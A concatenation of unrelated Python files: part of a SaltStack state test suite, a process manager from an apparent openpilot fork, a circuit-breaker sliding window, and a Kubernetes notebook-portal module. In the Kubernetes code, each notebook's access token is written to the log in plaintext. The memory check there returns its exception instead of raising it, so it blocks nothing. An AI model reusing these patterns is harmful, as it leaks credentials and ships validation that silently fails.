mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
if not (os.system("python3 -m pip list | grep 'scipy' ") == 0):
os.system("cd /data/openpilot/installer/scipy_installer/ && ./scipy_installer")
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry:
print("scons build failed, cleaning in")
for i in range(3,-1,-1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("Openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
from common.manager_helpers import print_cpu_usage
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"trafficd": ("selfdrive/trafficd", ["./trafficd"]),
"traffic_manager": "selfdrive.trafficd.traffic_manager",
"thermalonlined": "selfdrive.thermalonlined",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"mapd": ("selfdrive/mapd", ["./mapd.py"]),
"driverview": "selfdrive.controls.lib.driverview",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'trafficd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'mapd',
'thermalonlined',
'locationd',
'traffic_manager',
'dmonitoringd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
if proc[0] != 'selfdrive/mapd':
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
gps_sock = messaging.sub_sock('gpsLocation', conflate=True)
if os.getenv("GET_CPU_USAGE"):
proc_sock = messaging.sub_sock('procLog', conflate=True)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
#for p in daemon_processes:
# start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
start_t = time.time()
first_proc = None
while 1:
gps = messaging.recv_one_or_none(gps_sock)
msg = messaging.recv_sock(thermal_sock, wait=True)
if gps:
if 47.3024876979 < gps.gpsLocation.latitude < 54.983104153 and 5.98865807458 < gps.gpsLocation.longitude < 15.0169958839:
logger_dead = True
else:
logger_dead = True
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
if os.getenv("GET_CPU_USAGE"):
dt = time.time() - start_t
# Get first sample
if dt > 30 and first_proc is None:
first_proc = messaging.recv_sock(proc_sock)
# Get last sample and exit
if dt > 90:
last_proc = messaging.recv_sock(proc_sock, wait=True)
cleanup_all_processes(None, None)
sys.exit(print_cpu_usage(first_proc, last_proc))
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("DisablePowerDownTime", "30"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except SystemExit:
raise
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
raise
# manual exit because we are forked
sys.exit(0)
|
slidingwindow.py
|
# -*- coding: utf-8 -*-
import threading
import time
import bucket
OPEN = 0
CLOSE = 1
HALF_OPEN = 2
class SlidingWindow(object):
def __init__(self, rate, period, half_seconds, sample_count, step, threshold_percentage):
"""
SlidingWindow
"""
self.rate = rate
self.period = period
self.half_seconds = half_seconds
self.sample_count = sample_count
self.tail = 0
self.buckets = []
self.step = step
self.status = CLOSE
self._semaphore = threading.Semaphore(1)
self._threshold_percentage = threshold_percentage
for _ in xrange(period / rate):
self.buckets.append(bucket.Bucket())
def increase_total(self):
self.buckets[self.tail].add_total(self.step)
def increase_fail(self):
self.buckets[self.tail].add_fail(self.step)
def _calculate_failure_rate(self):
"""
Calculate the failure rate
:return:
"""
total, fail = 0, 0
for i in xrange(self.tail + 1):
total += self.buckets[i].total
fail += self.buckets[i].fail
return float(fail) / float(total)
def _total(self):
total = 0
for i in xrange(self.tail + 1):
total += self.buckets[i].total
return total
def acquire_sem(self):
return self._semaphore.acquire(False)
def release_sem(self):
return self._semaphore.release()
def start(self):
thread = threading.Thread(target=self.increase_tail, name='increase_tail_thread')
thread.setDaemon(True)
thread.start()
def increase_tail(self):
"""
slide the window and decide whether to create a new bucket
:return:
"""
while 1:
# decide whether to open the breaker
if self.status == CLOSE and self._total() > self.sample_count and self._calculate_failure_rate() > self._threshold_percentage:
self.set_open()
if self.tail + 1 >= self.period / self.rate:
tmp_buckets = self.buckets[1:self.tail + 1]
tmp_buckets.append(bucket.Bucket())
self.buckets = tmp_buckets
else:
self.tail += 1
time.sleep(self.rate / 1000)
def _set_half_open(self):
self.status = HALF_OPEN
def set_open(self):
"""
Set the breaker status to OPEN
:return:
"""
self.status = OPEN
threading.Timer(self.half_seconds / 1000, self._set_half_open).start()
|
k8s_api.py
|
import yaml
import time
import datetime
import threading
import os
import re
import string
import urllib
from base64 import b64encode
from datetime import timezone
from jinja2 import Environment, FileSystemLoader, select_autoescape
from kubernetes import client, config
from portal import logger
from portal import app
templates = Environment(loader=FileSystemLoader("portal/yaml"), autoescape=select_autoescape())
namespace = app.config.get("NAMESPACE")
domain_name = app.config.get('DOMAIN_NAME')
ingress_class = app.config.get('INGRESS_CLASS')
gpu_available = app.config.get("GPU_AVAILABLE")
config_file = app.config.get("KUBECONFIG")
k8s_charset = set(string.ascii_lowercase + string.ascii_uppercase + string.digits + '_' + '-' + '.')
class k8sException(Exception):
pass
def load_kube_config():
try:
if config_file:
config.load_kube_config(config_file = config_file)
logger.info("Loaded kubeconfig from file %s" %config_file)
else:
config.load_kube_config()
logger.info("Loaded default kubeconfig file")
logger.info("Using namespace %s" %namespace)
logger.info("Using domain name %s" %domain_name)
logger.info("GPU is available as a resource" if gpu_available else "GPU is not available as a resource")
logger.info("Using kubernetes.io/ingress.class %s" %ingress_class)
except:
logger.error("Error loading kubeconfig")
config.load_kube_config()
def start_notebook_manager():
t = threading.Thread(target=manage_notebooks)
t.start()
logger.info("Started k8s notebook manager")
def manage_notebooks():
time.sleep(10)
while True:
pods = get_pods()
for pod in pods:
if has_notebook_expired(pod):
try:
logger.info("Notebook %s in namespace %s has expired" %(pod.metadata.name, namespace))
remove_notebook(pod.metadata.name)
except:
logger.info('Error removing notebook %s during management cycle' %pod.metadata.name)
time.sleep(1800)
def generate_token():
token_bytes = os.urandom(32)
b64_encoded = b64encode(token_bytes).decode()
return b64_encoded
def create_pod(notebook_id, display_name, username, globus_id, cpu, memory, gpu, gpu_memory, image, time_duration, token):
try:
api = client.CoreV1Api()
template = templates.get_template("pod.yaml")
cpu_limit = cpu * 2
memory_limit = memory * 2
pod = yaml.safe_load(
template.render(
namespace=namespace,
notebook_id=notebook_id,
display_name=display_name,
username=username,
globus_id=globus_id,
token=token,
cpu_request=cpu,
cpu_limit=cpu_limit,
memory_request=f"{memory}Gi",
memory_limit=f"{memory_limit}Gi",
gpu_request=gpu,
gpu_limit=gpu,
gpu_available=gpu_available,
gpu_memory=gpu_memory,
image=image,
days=time_duration))
api.create_namespaced_pod(namespace=namespace, body=pod)
except Exception as err:
logger.error('Error creating pod %s' %notebook_id)
logger.error(str(err))
raise k8sException('Error creating pod %s' %notebook_id)
def create_service(notebook_id, image):
try:
api = client.CoreV1Api()
template = templates.get_template("service.yaml")
service = yaml.safe_load(
template.render(
namespace=namespace,
notebook_id=notebook_id,
image=image))
api.create_namespaced_service(namespace=namespace, body=service)
except:
logger.error('Error creating service %s' %notebook_id)
raise k8sException('Error creating service %s' %notebook_id)
def create_ingress(notebook_id, username, image):
try:
api = client.NetworkingV1Api()
template = templates.get_template("ingress.yaml")
ingress = yaml.safe_load(
template.render(
domain_name=domain_name,
ingress_class=ingress_class,
namespace=namespace,
notebook_id=notebook_id,
username=username,
image=image))
api.create_namespaced_ingress(namespace=namespace,body=ingress)
except:
logger.error('Error creating ingress %s' %notebook_id)
raise k8sException('Error creating ingress %s' %notebook_id)
def create_secret(notebook_id, username, token):
try:
api = client.CoreV1Api()
template = templates.get_template("secret.yaml")
sec = yaml.safe_load(
template.render(
namespace=namespace,
notebook_id=notebook_id,
username=username,
token=token))
api.create_namespaced_secret(namespace=namespace, body=sec)
except:
logger.error('Error creating secret %s' %notebook_id)
raise k8sException('Error creating secret %s' %notebook_id)
def supports_image(image):
images = [
'ivukotic/ml_platform:latest',
'ivukotic/ml_platform:conda',
'ivukotic/ml_platform_auto:latest',
'ivukotic/ml_platform_auto:conda',
'hub.opensciencegrid.org/usatlas/ml-platform:latest',
'hub.opensciencegrid.org/usatlas/ml-platform:conda'
]
return image in images
def notebook_id_available(notebook_id):
try:
core_v1_api = client.CoreV1Api()
pods = core_v1_api.list_namespaced_pod(namespace, label_selector="instance={0}".format(notebook_id))
if not pods or len(pods.items) == 0:
return True
except:
logger.error('Error checking whether notebook name %s is available' %notebook_id)
raise k8sException('Error checking whether notebook name %s is available' %notebook_id)
def cpu_request_valid(cpu):
if cpu >=1 and cpu <= 4:
return True
return False
def memory_request_valid(memory):
if memory >=1 and memory <= 16:
return True
return False
def gpu_request_valid(gpu):
if gpu >=0 and gpu <= 7:
return True
return False
def validate(notebook_name, notebook_id, username, cpu, memory, gpu, gpu_memory, image, time_duration):
if " " in notebook_name:
logger.warning('The name %s has whitespace' %notebook_name)
raise k8sException('The notebook name cannot have any whitespace')
if len(notebook_name) > 30:
logger.warning('The name %s has more than 30 characters' %notebook_name)
raise k8sException('The notebook name cannot exceed 30 characters')
if not set(notebook_name) <= k8s_charset:
logger.warning('The name %s has invalid characters' %notebook_name)
raise k8sException('Valid characters are a-zA-Z0-9 and ._-')
if not supports_image(image):
logger.warning('Docker image %s is not suppported' %image)
raise k8sException('Docker image %s is not supported' %image)
if not notebook_id_available(notebook_id):
logger.warning('The name %s is already taken' %notebook_name)
raise k8sException('The name %s is already taken' %notebook_name)
if not cpu_request_valid(cpu):
logger.warning('The request of %d CPUs is outside the bounds [1, 4]' %cpu)
raise k8sException('The request of %d CPUs is outside the bounds [1, 4]' %cpu)
if not memory_request_valid(memory):
logger.warning('The request of %d GB is outside the bounds [1, 16]' %memory)
return k8sException('The request of %d GB is outside the bounds [1, 16]' %memory)
if not gpu_request_valid(gpu):
logger.warning('The request of %d GPUs is outside the bounds [1, 7]' %gpu)
raise k8sException('The request of %d GPUs is outside the bounds [1, 7]' %gpu)
if not gpu_memory or gpu_memory not in (4864, 40536):
logger.warning('The gpu_memory value has to be 4864 or 40536')
raise k8sException('The gpu_memory value has to be 4864 or 40536')
def create_notebook(notebook_name, username, globus_id, cpu, memory, gpu, gpu_memory, image, time_duration):
notebook_id = notebook_name.lower()
validate(notebook_name, notebook_id, username, cpu, memory, gpu, gpu_memory, image, time_duration)
token = generate_token()
logger.info("The token for %s is %s" %(notebook_name, token))
create_pod(notebook_id, notebook_name, username, globus_id, cpu, memory, gpu, gpu_memory, image, time_duration, token)
create_service(notebook_id, image)
create_ingress(notebook_id, username, image)
create_secret(notebook_id, username, token)
logger.info('Created notebook %s' %notebook_name)
def get_creation_date(pod):
return pod.metadata.creation_timestamp
def get_expiration_date(pod):
try:
if hasattr(pod.metadata, 'labels') and 'time2delete' in pod.metadata.labels:
creation_ts = pod.metadata.creation_timestamp
duration = pod.metadata.labels['time2delete']
